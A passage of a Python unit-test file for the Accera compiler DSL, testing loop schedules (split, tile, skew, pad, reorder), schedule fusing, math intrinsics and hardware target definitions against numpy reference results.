self._build_nest(nest, [A, B, C], f"test_bitwise_operations_{t.name}")
def test_intrinsics(self) -> None:
from accera import max, min
for t in INT_TYPES + FLOAT_TYPES:
nest, A, B, C = self._create_nest((16, 10, 11), type=t)
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += max(A[i, j], B[j, k])
C[i, j] += min(A[i, j], B[j, k])
self._build_nest(nest, [A, B, C], f"test_intrinsics_{t.name}")
def test_intrinsics_float(self) -> None:
from accera import abs, sqrt, exp, log, log10, log2, sin, cos, ceil, floor, tan, cosh, sinh, tanh
# from accera._lang_python import fast_exp, fast_exp_mlas
for t in FLOAT_TYPES:
nest, A, B, C = self._create_nest((16, 10, 11), type=t)
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += abs(A[i, j])
C[i, j] += exp(A[i, j])
# C[i, j] += fast_exp(A[i, j])
# C[i, j] += fast_exp_mlas(A[i, j])
C[i, j] += log(B[j, k])
C[i, j] += log2(B[j, k])
C[i, j] += log10(A[i, j])
C[i, j] += sin(A[i, j])
C[i, j] += cos(B[j, k])
C[i, j] += tan(A[i, j])
C[i, j] += sqrt(B[j, k])
C[i, j] += ceil(B[j, k])
C[i, j] += floor(A[i, j])
C[i, j] += sinh(A[i, j])
C[i, j] += cosh(B[j, k])
C[i, j] += tanh(A[i, j])
self._build_nest(nest, [A, B, C], f"test_intrinsics_float_{t.name}")
def test_convenience_syntax_1(self) -> None:
nest, A, B, C = self._create_nest((16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] + B[k, j]
package = Package()
package_name = "test_convenience_syntax_2"
package.add(nest, args=(A, B, C), base_name="matmul")
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_convenience_syntax_2(self) -> None:
nest, A, B, C = self._create_nest((16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
plan = nest.create_plan()
package = Package()
package_name = "test_convenience_syntax_2"
package.add(plan, args=(A, B, C), base_name="matmul")
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
class DSLTest_03Schedules(unittest.TestCase):
def _create_nest(self, shape: Tuple[int], type=ScalarType.float32) -> Tuple:
M, N, S = shape
A = Array(role=Array.Role.INPUT, element_type=type, shape=(M, S))
B = Array(role=Array.Role.INPUT, element_type=type, shape=(S, N))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=type, shape=(M, N))
return Nest(shape=(M, N, S)), A, B, C
def _verify_schedule(self, schedule, args: Tuple[Array], package_name, correctness_check_values=None) -> None:
# create a HAT package and add the function to it
package = Package()
function = package.add(schedule, args, base_name="schedule_test")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
# build the HAT package
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
def test_schedule_reorder(self) -> None:
nest, A, B, C = self._create_nest((16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
schedule.reorder(k, i, j)
self.assertEqual(schedule._indices, [k, i, j])
schedule.reorder(order=(j, i, k))
self.assertEqual(schedule._indices, [j, i, k])
self._verify_schedule(schedule, [A, B, C], "test_schedule_reorder")
def test_schedule_split(self) -> None:
nest, A, B, C = self._create_nest((16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
ii = schedule.split(i, 4)
iii = schedule.split(i, 2)
iiii = schedule.split(ii, 2)
for index in [ii, iii, iiii]:
self.assertIsNotNone(index)
self.assertEqual(schedule._indices, [i, iii, ii, iiii, j, k])
self._verify_schedule(schedule, [A, B, C], "test_schedule_split1")
# split size does not divide the dimension size
schedule2 = nest.create_schedule()
kk = schedule2.split(k, 4) # original size of dimension k was 11
self.assertIsNotNone(kk)
self.assertEqual(schedule2._indices, [i, j, k, kk])
self._verify_schedule(schedule2, [A, B, C], "test_schedule_split2")
# split size == dimension size
schedule3 = nest.create_schedule()
kk = schedule3.split(k, 11) # original size of dimension k was 11
self.assertIsNotNone(kk)
self.assertEqual(schedule3._indices, [i, j, k, kk])
self._verify_schedule(schedule3, [A, B, C], "test_schedule_split3")
# split size > dimension size
schedule4 = nest.create_schedule()
kk = schedule4.split(k, 13) # original size of dimension k was 11
self.assertIsNotNone(kk)
self.assertEqual(schedule4._indices, [i, j, k, kk])
self._verify_schedule(schedule4, [A, B, C], "test_schedule_split4")
def test_schedule_set_invalid_order(self) -> None:
nest, A, B, C = self._create_nest((16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
ii = schedule.split(i, 2)
iii = schedule.split(ii, 2)
jj = schedule.split(j, 5)
self.assertEqual(schedule._indices, [i, ii, iii, j, jj, k])
with self.assertRaises(ValueError):
schedule.reorder(k, i, jj, j)
self.assertEqual(schedule._indices, [i, ii, iii, j, jj, k])
with self.assertRaises(ValueError):
schedule.reorder(k, ii, iii, j, jj, i)
self.assertEqual(schedule._indices, [i, ii, iii, j, jj, k])
schedule.reorder(i, j, ii, jj, iii, k)
self.assertEqual(schedule._indices, [i, j, ii, jj, iii, k])
def test_schedule_tile(self) -> None:
nest, A, B, C = self._create_nest((16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
ii, jj, kk = schedule.tile({
i: 8,
j: 2,
k: 3
})
self.assertIsNotNone(ii)
self.assertIsNotNone(jj)
self.assertIsNotNone(kk)
self.assertEqual(schedule._indices, [i, ii, j, jj, k, kk])
self._verify_schedule(schedule, [A, B, C], "test_schedule_tile")
# tile a subset of the iteration space
schedule1 = nest.create_schedule()
iii, kkk = schedule1.tile({
i: 8,
k: 3
})
self.assertIsNotNone(iii)
self.assertIsNotNone(kkk)
self.assertEqual(schedule1._indices, [i, iii, j, k, kkk])
self._verify_schedule(schedule1, [A, B, C], "test_schedule_tile_subset")
def test_schedule_skew(self) -> None:
for N in [10, 224]: # input sizes
for K in [1, 3, 5]: # filter sizes
M = N - K + 1 # output size
A = Array(role=Array.Role.INPUT, shape=(N, ))
B = Array(role=Array.Role.INPUT, shape=(K, ))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(M, ))
nest = Nest(shape=(M, K))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
C[i] += A[i + j] * B[j]
schedule = nest.create_schedule()
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_test + np.convolve(np.flip(B_test), A_test, "valid")]
}
# Skew dimension i with respect to dimension j.
schedule.skew(i, j)
self._verify_schedule(schedule, [A, B, C], f"test_schedule_skew_i_j_{N}_{K}", correctness_check_values)
# Skew dimension j with respect to dimension i.
schedule1 = nest.create_schedule()
schedule1.skew(j, i)
self._verify_schedule(schedule1, [A, B, C], f"test_schedule_skew_j_i_{N}_{K}", correctness_check_values)
def test_schedule_skew_unrolling(self) -> None:
N = 10 # input size
K = 3 # filter size
M = N - K + 1 # output size = 8
A = Array(role=Array.Role.INPUT, shape=(N, ))
B = Array(role=Array.Role.INPUT, shape=(K, ))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(M, ))
nest = Nest(shape=(M, K))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
C[i] += A[i + j] * B[j]
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_test + np.convolve(np.flip(B_test), A_test, "valid")]
}
# Skew dimension i with respect to dimension j, with unrolling.
schedule = nest.create_schedule()
schedule.skew(i, j, unroll_loops_smaller_than=3)
self._verify_schedule(schedule, [A, B, C], "test_schedule_skew_i_j_with_unrolling", correctness_check_values)
# Skew dimension j with respect to dimension i, with unrolling.
schedule1 = nest.create_schedule()
schedule1.skew(j, i, unroll_loops_smaller_than=3)
self._verify_schedule(schedule1, [A, B, C], f"test_schedule_skew_j_i_with_unrolling", correctness_check_values)
def test_schedule_pad(self) -> None:
nest, A, B, C = self._create_nest((16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
# Adds empty elements to the beginning of dimension i, j, k
schedule.pad(i, 2)
ii = schedule.split(i, 3) # (2 + 16) // 3
# should result in these loops for i, ii
# i: [2, 3:3), ii: [0, 1:1) <-- partial (front padding)
# i: [3: 18:3), ii: [0, 3:1) <-- full
schedule.pad(j, 3)
jj = schedule.split(j, 3) # (3 + 10) // 3
# should result in these loops for j, jj
# j: [3, 12:3), jj: [0, 3:3) <-- full (front padding == split size)
# j: [12, 13:3), jj: [0, 1:1) <-- partial (automatic back padding)
schedule.pad(k, 11)
kk = schedule.split(k, 4) # (11 + 11) // 4
# should result in these loops for k, kk
# k: [11, 12:1), kk: [0, 1: 1) <-- partial
# k: [12, 20:4), kk: [0: 4: 1) <-- full
# k: [20, 22:4), kk: [0: 2: 1) <-- partial (automatic back padding)
schedule.reorder(i, ii, k, j, jj, kk)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_test + A_test @ B_test]
}
self._verify_schedule(schedule, [A, B, C], "test_schedule_pad", correctness_check_values)
def test_convenience_syntax(self) -> None:
nest, A, B, C = self._create_nest((16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
package = Package()
package_name = "test_convenience_syntax"
package.add(schedule, args=(A, B, C), base_name="plan_test")
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
class DSLTest_04Fusing(unittest.TestCase):
def _verify_schedule(self, schedule, args: Tuple[Array], package_name, correctness_check_values) -> None:
# create a HAT package and add the function to it
package = Package()
function = package.add(schedule, args, base_name="fusing_test")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
# build the HAT package
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
def test_full_iteration_space_fusing(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT, shape=(16, 16))
B = Array(role=Array.Role.INPUT, shape=(16, 16))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(16, 16))
# Create nest0 and schedule
nest0 = Nest(shape=(16, 16))
i0, j0 = nest0.get_indices()
@nest0.iteration_logic
def _():
C[i0, j0] += A[i0, j0]
schedule0 = nest0.create_schedule()
# Create nest1 and schedule1
nest1 = Nest(shape=(16, 16))
i1, j1 = nest1.get_indices()
@nest1.iteration_logic
def _():
C[i1, j1] *= B[i1, j1]
schedule1 = nest1.create_schedule()
# Create a fused schedule
schedule = fuse(schedule0, schedule1)
f, i, j = schedule.get_indices()
schedule.reorder(i, j, f)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, (C_test + A_test) * B_test]
}
self._verify_schedule(schedule, (A, B, C), "test_full_iteration_space_fusing1", correctness_check_values)
# computing the output block-by-block:
# first computing C[0:4, 0:4] += A[0:4, 0:4]
# then computing C[0:4, 0:4] *= B[0:4, 0:4]
ii, jj = schedule.tile({
i: 4,
j: 4
})
schedule.reorder(i, j, f, ii, jj)
self._verify_schedule(schedule, (A, B, C), "test_full_iteration_space_fusing2", correctness_check_values)
def test_partial_iteration_space_fusing_1(self) -> None:
from accera import fuse, Nest, max
from accera._lang_python._lang import Scalar
A = Array(role=Array.Role.INPUT, shape=(16, 11))
B = Array(role=Array.Role.INPUT, shape=(11, 10))
C = Array(role=Array.Role.INPUT, shape=(16, 10))
# Fully-connected neural layer with activation: C = op(C + A @ B)
# Create nest0 and schedule0
nest0 = Nest(shape=(16, 10, 11))
i0, j0, k0 = nest0.get_indices()
@nest0.iteration_logic
def _():
C[i0, j0] += A[i0, k0] * B[k0, j0]
schedule0 = nest0.create_schedule()
# Create nest1 and schedule1
nest1 = Nest(shape=(16, 10))
i1, j1 = nest1.get_indices()
@nest1.iteration_logic
def _():
# BUGBUG: should implicitly convert Scalar
C[i1, j1] = max(C[i1, j1], Scalar(0.))
schedule1 = nest1.create_schedule()
schedule = fuse((schedule0, schedule1), partial=2)
f, i, j, k = schedule.get_indices()
schedule.reorder(i, j, f, k)
# unfused indices (k) must not precede the fusing index (f)
with self.assertRaises(ValueError):
schedule.reorder(i, j, k, f)
self.assertEqual(schedule._indices, [i, j, f, k])
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, np.maximum(C_test + A_test @ B_test, 0.)]
}
self._verify_schedule(schedule, (A, B, C), "test_partial_iteration_space_fusing_1", correctness_check_values)
def test_partial_iteration_space_fusing_2(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT_OUTPUT, shape=(16, ))
B = Array(role=Array.Role.INPUT_OUTPUT, shape=(4, ))
n0 = Nest([16])
i0 = n0.get_indices()
@n0.iteration_logic
def _():
A[i0] *= A[i0]
s0 = n0.create_schedule()
n1 = Nest([16, 4])
i1, j1 = n1.get_indices()
@n1.iteration_logic
def _():
B[j1] += A[i1]
s1 = n1.create_schedule()
fs = fuse((s0, s1), partial=1)
f, i, j = fs.get_indices()
jj = fs.split(j, 2)
fs.reorder(i, f, j, jj)
A_test_pre = np.random.random(A.shape).astype(np.float32)
B_test_pre = np.random.random(B.shape).astype(np.float32)
A_test_post = A_test_pre * A_test_pre
B_test_post = B_test_pre + np.sum(A_test_post)
correctness_check_values = {
"pre": [A_test_pre, B_test_pre],
"post": [A_test_post, B_test_post]
}
self._verify_schedule(fs, (A, B), "test_partial_iteration_space_fusing_2", correctness_check_values)
def test_unequal_iteration_space_fusing_1(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT, shape=(16, 16))
B = Array(role=Array.Role.INPUT, shape=(16, 10))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(16, 16))
# Create nest0 and schedule
nest0 = Nest(shape=(16, 16))
i0, j0 = nest0.get_indices()
@nest0.iteration_logic
def _():
C[i0, j0] += A[i0, j0]
schedule0 = nest0.create_schedule()
# Create nest1 and schedule1 with a smaller iteration space size
nest1 = Nest(shape=(16, 10))
i1, j1 = nest1.get_indices()
@nest1.iteration_logic
def _():
C[i1, j1] *= B[i1, j1]
schedule1 = nest1.create_schedule()
# Create a fused schedule: the smaller iteration space (nest1) should
# be automatically end-padded with no-ops
schedule = fuse(schedule0, schedule1)
f, i, j = schedule.get_indices()
schedule.reorder(i, j, f)
# Emitted fused loop should look like:
# for i in range(0, 16):
# for j in range(0, 10):
# for f in range(2):
# if f == 0:
# C[i, j] += A[i, j]
# if f == 1:
# C[i, j] *= B[i, j]
# for j in range(10, 16):
# for f in range(2):
# if f == 0:
# C[i, j] += A[i, j]
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
C_ref = C_test + A_test # nest0
C_ref[:, :B.shape[1]] = C_ref[:, :B.shape[1]] * B_test # nest1
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_ref]
}
self._verify_schedule(schedule, (A, B, C), "test_unequal_iteration_space_fusing_1", correctness_check_values)
def test_unequal_iteration_space_fusing_2(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT, shape=(16, 10))
B = Array(role=Array.Role.INPUT, shape=(16, 16))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(16, 16))
# Create nest0 and schedule
nest0 = Nest(shape=(16, 10))
i0, j0 = nest0.get_indices()
@nest0.iteration_logic
def _():
C[i0, j0] += A[i0, j0]
schedule0 = nest0.create_schedule()
# Create nest1 and schedule1 with a larger iteration space size
nest1 = Nest(shape=(16, 16))
i1, j1 = nest1.get_indices()
@nest1.iteration_logic
def _():
C[i1, j1] *= B[i1, j1]
schedule1 = nest1.create_schedule()
# Create a fused schedule: the smaller iteration space (nest0) should
# be automatically end-padded with no-ops
schedule = fuse(schedule0, schedule1)
f, i, j = schedule.get_indices()
schedule.reorder(i, j, f)
# Emitted fused loop should look like:
# for i in range(0, 16):
# for j in range(0, 10):
# for f in range(2):
# if f == 0:
# C[i, j] += A[i, j]
# if f == 1:
# C[i, j] *= B[i, j]
# for j in range(10, 16):
# for f in range(2):
# if f == 1:
# C[i, j] *= B[i, j]
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
C_ref = np.copy(C_test)
C_ref[:, :A.shape[1]] = C_test[:, :A.shape[1]] + A_test # nest0
C_ref *= B_test # nest1
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_ref]
}
self._verify_schedule(schedule, (A, B, C), "test_unequal_iteration_space_fusing_2", correctness_check_values)
def test_unequal_iteration_space_fusing_3(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT, shape=(16, 16))
B = Array(role=Array.Role.INPUT, shape=(16, 10))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(16, 16))
# Create nest0 and schedule
nest0 = Nest(shape=(16, 16))
i0, j0 = nest0.get_indices()
@nest0.iteration_logic
def _():
C[i0, j0] += A[i0, j0]
schedule0 = nest0.create_schedule()
# Create nest1 and schedule1 with a smaller iteration space size
nest1 = Nest(shape=(16, 10))
i1, j1 = nest1.get_indices()
@nest1.iteration_logic
def _():
C[i1, j1] *= B[i1, j1]
schedule1 = nest1.create_schedule()
# Create a fused schedule: the smaller iteration space (nest1) should
# be automatically end-padded with no-ops
schedule = fuse(schedule0, schedule1)
f, i, j = schedule.get_indices()
# computing the output block-by-block:
# first computing C[0:4, 0:4] += A[0:4, 0:4]
# then computing C[0:4, 0:4] *= B[0:4, 0:4]
ii, jj = schedule.tile({
i: 4,
j: 4
})
schedule.reorder(i, j, f, ii, jj)
# Emitted fused loop should look like:
# for i in range(0, 16, 4):
# # run both kernels in the smaller iteration spaces
# # (tiled block)
# for j in range(0, 8, 4):
# for f in range(2):
# if f == 0:
# for ii in range(0, 4):
# for jj in range(0, 4):
# C[i+ii, j+jj] += A[i+ii, j+jj]
# if f == 1:
# for ii in range(0, 4):
# for jj in range(0, 4):
# C[i+ii, j+jj] *= B[i+ii, j+jj]
#
# # run both kernels in the smaller iteration space
# # (boundary block for split)
# for j in range(8, 10): # range < split size
# for f in range(2):
# if f == 0:
# for ii in range(0, 4):
# C[i+ii, j] += A[i+ii, j]
# if f == 1:
# for ii in range(0, 4):
# C[i+ii, j] *= B[i+ii, j]
#
# # run kernel with the larger iteration space
# # (boundary block for split)
# for j in range(10, 16): # range < split size
# for f in range(2):
# if f == 0:
# for ii in range(0, 4):
# C[i+ii, j] += A[i+ii, j]
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
C_ref = C_test + A_test # nest0
C_ref[:, :B.shape[1]] = C_ref[:, :B.shape[1]] * B_test # nest1
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_ref]
}
self._verify_schedule(schedule, (A, B, C), "test_unequal_iteration_space_fusing_3", correctness_check_values)
def test_concat_fusing_1(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT_OUTPUT, shape=(3, ))
B = Array(role=Array.Role.INPUT_OUTPUT, shape=(7, ))
n1 = Nest(A.shape)
n2 = Nest(B.shape)
n1_i = n1.get_indices()
@n1.iteration_logic
def _():
A[n1_i] /= A[n1_i]
n2_i = n2.get_indices()
@n2.iteration_logic
def _():
B[n2_i] *= B[n2_i]
fused = fuse([n.create_schedule() for n in [n1, n2]], partial=0)
# Emitted fused loop should look like:
# for f in range(3):
# if f == 0:
# for i in range(3):
# A[i] /= A[i]
# if f == 1:
# for i in range(7):
# B[i] *= B[i]
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
A_ref = A_test / A_test
B_ref = B_test * B_test
correctness_check_values = {
"pre": [A_test, B_test],
"post": [A_ref, B_ref]
}
self._verify_schedule(fused, (A, B), "test_concat_fusing_1", correctness_check_values)
@expectedFailure(FailedReason.BUG, "Concat fusing is broken")
def test_concat_fusing_2(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT_OUTPUT, shape=(11, ))
B = Array(role=Array.Role.INPUT_OUTPUT, shape=(7, ))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(5, ))
n1 = Nest(A.shape)
n2 = Nest(B.shape)
n3 = Nest(C.shape)
n1_i = n1.get_indices()
@n1.iteration_logic
def _():
A[n1_i] += A[n1_i]
n2_i = n2.get_indices()
@n2.iteration_logic
def _():
B[n2_i] *= B[n2_i]
n3_i = n3.get_indices()
@n3.iteration_logic
def _():
C[n3_i] /= C[n3_i]
fused = fuse([n.create_schedule() for n in [n1, n2, n3]], partial=0)
# Emitted fused loop should look like:
# for f in range(3):
# if f == 0:
# for i in range(11):
# A[i}] += A[i}]
# if f == 1:
# for i in range(7):
# B[i}] *= B[i}]
# if f == 2:
# for i in range(5):
# C[i}] /= C[i}]
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
A_ref = A_test + A_test
B_ref = B_test * B_test
C_ref = C_test / C_test
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_ref, B_ref, C_ref]
}
self._verify_schedule(fused, (A, B, C), "test_concat_fusing_2", correctness_check_values)
def test_concat_fusing_3(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT_OUTPUT, shape=(3, 16))
B = Array(role=Array.Role.INPUT_OUTPUT, shape=(7, 16))
n1 = Nest(A.shape)
n2 = Nest(B.shape)
n1_i, n1_j = n1.get_indices()
@n1.iteration_logic
def _():
A[n1_i, n1_j] /= A[n1_i, n1_j]
n2_i, n2_j = n2.get_indices()
@n2.iteration_logic
def _():
B[n2_i, n2_j] *= B[n2_i, n2_j]
fused = fuse([n.create_schedule() for n in [n1, n2]], partial=0)
# Emitted fused loop should look like:
# for f in range(3):
# if f == 0:
# for i in range(3):
# for j in range(16):
# A[i,j] /= A[i,j]
# if f == 1:
# for i in range(7):
# for j in range(16):
# B[i,j] *= B[i,j]
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
A_ref = A_test / A_test
B_ref = B_test * B_test
correctness_check_values = {
"pre": [A_test, B_test],
"post": [A_ref, B_ref]
}
self._verify_schedule(fused, (A, B), "test_concat_fusing_3", correctness_check_values)
@expectedFailure(FailedReason.BUG, "Concat fusing is broken")
def test_concat_fusing_4(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT_OUTPUT, shape=(11, 16))
B = Array(role=Array.Role.INPUT_OUTPUT, shape=(7, 16))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(5, 16))
n1 = Nest(A.shape)
n2 = Nest(B.shape)
n3 = Nest(C.shape)
n1_i, n1_j = n1.get_indices()
@n1.iteration_logic
def _():
A[n1_i, n1_j] += A[n1_i, n1_j]
n2_i, n2_j = n2.get_indices()
@n2.iteration_logic
def _():
B[n2_i, n2_j] *= B[n2_i, n2_j]
n3_i, n3_j = n3.get_indices()
@n3.iteration_logic
def _():
C[n3_i, n3_j] /= C[n3_i, n3_j]
fused = fuse([n.create_schedule() for n in [n1, n2, n3]], partial=0)
# Emitted fused loop should look like:
# for f in range(3):
# if f == 0:
# for i in range(11):
# for j in range(16):
# A[i,j] += A[i,j]
# if f == 1:
# for i in range(7):
# for j in range(16):
# B[i,j] *= B[i,j]
# if f == 2:
# for i in range(5):
# for j in range(16):
# C[i,j] /= C[i,j]
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
A_ref = A_test + A_test
B_ref = B_test * B_test
C_ref = C_test / C_test
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_ref, B_ref, C_ref]
}
self._verify_schedule(fused, (A, B, C), "test_concat_fusing_4", correctness_check_values)
@unittest.skip("BUG: Compilation takes too long")
def test_multi_concat_fusing_1(self) -> None:
from accera import fuse, Nest
A = Array(role=Array.Role.INPUT_OUTPUT, shape=(1024 + 13, ))
B = Array(role=Array.Role.INPUT_OUTPUT, shape=(1024 + 11, ))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(1024 + 7, ))
D = Array(role=Array.Role.INPUT_OUTPUT, shape=(1024 + 3, ))
# Create nest0 and schedule
nest0 = Nest(A.shape)
i0 = nest0.get_indices()
@nest0.iteration_logic
def _():
A[i0] += A[i0]
# Create nest1 and schedule1
nest1 = Nest(B.shape)
i1 = nest1.get_indices()
@nest1.iteration_logic
def _():
B[i1] *= B[i1]
# Create a fused schedule
s0, s1 = [n.create_schedule() for n in [nest0, nest1]]
s0.split(i0, 11)
s1.split(i1, 5)
fused1 = fuse([s0, s1], partial=0)
nest2 = Nest(C.shape)
i2 = nest2.get_indices()
@nest2.iteration_logic
def _():
C[i2] *= C[i2]
s2 = nest2.create_schedule()
s2.split(i2, 13)
fused2 = fuse([fused1, s2], partial=0)
nest3 = Nest(D.shape)
i3 = nest3.get_indices()
@nest3.iteration_logic
def _():
D[i3] *= D[i3]
s3 = nest3.create_schedule()
s3.split(i3, 7)
fused3 = fuse([fused2, s3], partial=0)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
D_test = np.random.random(D.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test, D_test],
"post": [A_test + A_test, B_test * B_test, C_test * C_test, D_test * D_test]
}
self._verify_schedule(fused3, (A, B, C, D), "test_multi_concat_fusing_1", correctness_check_values)
class DSLTest_05Targets(unittest.TestCase):
def test_known_targets(self) -> None:
intel_name = "Intel 6400"
intel = Target(known_name=intel_name, num_threads=44)
self.assertEqual(intel.name, intel_name)
self.assertEqual(intel.num_threads, 44) # override
self.assertEqual(intel.vector_bytes, 32) # default
self.assertEqual(intel.vector_registers, 16) # default
self.assertEqual(intel.category, Target.Category.CPU) # default
pi3_name = "Raspberry Pi 3B"
pi3 = Target(Target.Model.RASPBERRY_PI_3B, category=Target.Category.CPU, frequency_GHz=1.2)
self.assertEqual(pi3.name, pi3_name)
self.assertEqual(pi3.num_threads, 8)
self.assertEqual(pi3.category, Target.Category.CPU)
def test_custom_targets(self) -> None:
my_target = Target(
name="Custom processor",
category=Target.Category.CPU,
architecture="x86_64",
family="Broadwell",
extensions=["MMX", "SSE", "SSE2", "SSE3", "SSSE3", "SSE4", "SSE4.1", "SSE4.2", "AVX", "AVX2", "FMA3"],
num_cores=22,
num_threads=44,
frequency_GHz=3.2,
turbo_frequency_GHz=3.8,
cache_sizes=[32, 256, 56320],
cache_lines=[64, 64, 64]
)
self.assertEqual(my_target.name, "Custom processor")
self.assertEqual(my_target.category, Target.Category.CPU)
self.assertEqual(my_target.architecture, "x86_64")
self.assertTrue("SSE3" in my_target.extensions)
def test_gpu_targets(self) -> None:
v100_name = "NVidia V100"
v100 = Target(Target.Model.NVIDIA_V100, category=Target.Category.GPU)
self.assertEqual(v100.name, v100_name)
self.assertEqual(v100.category, Target.Category.GPU)
self.assertEqual(v100.warp_size, 32)
mi100 = Target(Target.Model.AMD_MI100)
self.assertEqual(mi100.warp_size, 64)
self.assertEqual(mi100.frequency_GHz, 1.502)
a100 = Target(Target.Model.NVIDIA_A100)
self.assertEqual(a100.warp_size, 32)
class DSLTest_06PlansCaching(unittest.TestCase):
def _create_plan(self, shape: Tuple[int], type=ScalarType.float32) -> Tuple:
M, N, S = shape
A = Array(role=Array.Role.INPUT, element_type=type, shape=(M, S))
B = Array(
role=Array.Role.INPUT, element_type=type, shape=(S, N), layout=Array.Layout.LAST_MAJOR
) # use a different caching layout
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=type, shape=(M, N))
nest = Nest(shape=(M, N, S))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
plan = nest.create_plan()
return plan, [A, B, C], [i, j, k]
def _verify_plan(self, plan, args: Tuple[Array], package_name, correctness_check_values=None) -> None:
